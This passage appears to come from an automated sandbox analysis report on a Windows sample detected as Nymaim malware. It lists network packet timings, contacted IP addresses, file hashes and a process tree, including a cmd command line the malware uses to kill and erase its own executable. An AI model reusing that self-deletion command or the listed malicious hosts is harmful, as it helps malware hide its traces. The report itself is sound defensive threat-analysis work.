Dec 9, 2022 10:47:08.978029966 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978065014 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978074074 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978087902 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978117943 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978123903 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978161097 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978168011 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978204966 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978220940 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978249073 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:08.978254080 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:08.978322983 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005016088 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005084991 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005130053 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005137920 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005182028 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005203009 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005203009 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005228996 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005265951 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005275965 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005287886 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005320072 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005340099 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005366087 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005374908 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005410910 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005430937 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005455017 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005462885 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005500078 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005532980 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005542994 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005557060 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005588055 CET	80	49699	107.182.129.235	192.168.2.3
Dec 9, 2022 10:47:09.005620956 CET	49699	80	192.168.2.3	107.182.129.235
Dec 9, 2022 10:47:09.005633116 CET	80	49699	107.182.129.235	192.168.2.3

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2022 10:46:54.544323921 CET	8.8.8.8	192.168.2.3	0x4045	No error (0)	windowsupdatebg.s.llnwi.net		178.79.242.0	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

45.139.105.171

107.182.129.235

171.22.30.106

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 5856, Parent PID: 3452

General

Target ID:	0
Start time:	10:46:59
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	2268666 bytes
MD5 hash:	F6EF13946619524C0E6BB1C01CFA73FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: is-188R9.tmpPID: 5832, Parent PID: 5856

General

Target ID:	1
Start time:	10:47:00
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-U0OJH.tmp\is-188R9.tmp" /SL4 $402C2 "C:\Users\user\Desktop\file.exe" 2023066 96256
Imagebase:	0x400000
File size:	704000 bytes
MD5 hash:	2C3832FDF847813369EC960CD39C8265
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: ntFolders.exePID: 6076, Parent PID: 5832

General

Target ID:	2
Start time:	10:47:03
Start date:	09/12/2022
Path:	C:\Program Files (x86)\PrintFolders\ntFolders.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\PrintFolders\ntFolders.exe"
Imagebase:	0x400000
File size:	3403776 bytes
MD5 hash:	E2D8395C6ADC664320DCF1CFC63336F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.330488356.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.329404364.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000002.00000002.330580256.0000000003330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: LUxJPTIXtIs.exePID: 5216, Parent PID: 6076

General

Target ID:	3
Start time:	10:47:07
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\LUxJPTIXtIs.exe
Wow64 process (32bit):	true
Commandline:
Imagebase:	0xd10000
File size:	73728 bytes
MD5 hash:	3FB36CB0B7172E5298D2992D42984D06
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	high

Analysis Process: cmd.exePID: 3788, Parent PID: 6076

General

Target ID:	13
Start time:	10:47:40
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c taskkill /im "ntFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\ntFolders.exe" & exit
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5220, Parent PID: 3788

General

Target ID:	14
Start time:	10:47:40
Start date:	09/12/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exePID: 588, Parent PID: 3788

General

Target ID:	15
Start time:	10:47:41
Start date:	09/12/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im "ntFolders.exe" /f
Imagebase:	0xca0000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

⊘No disassembly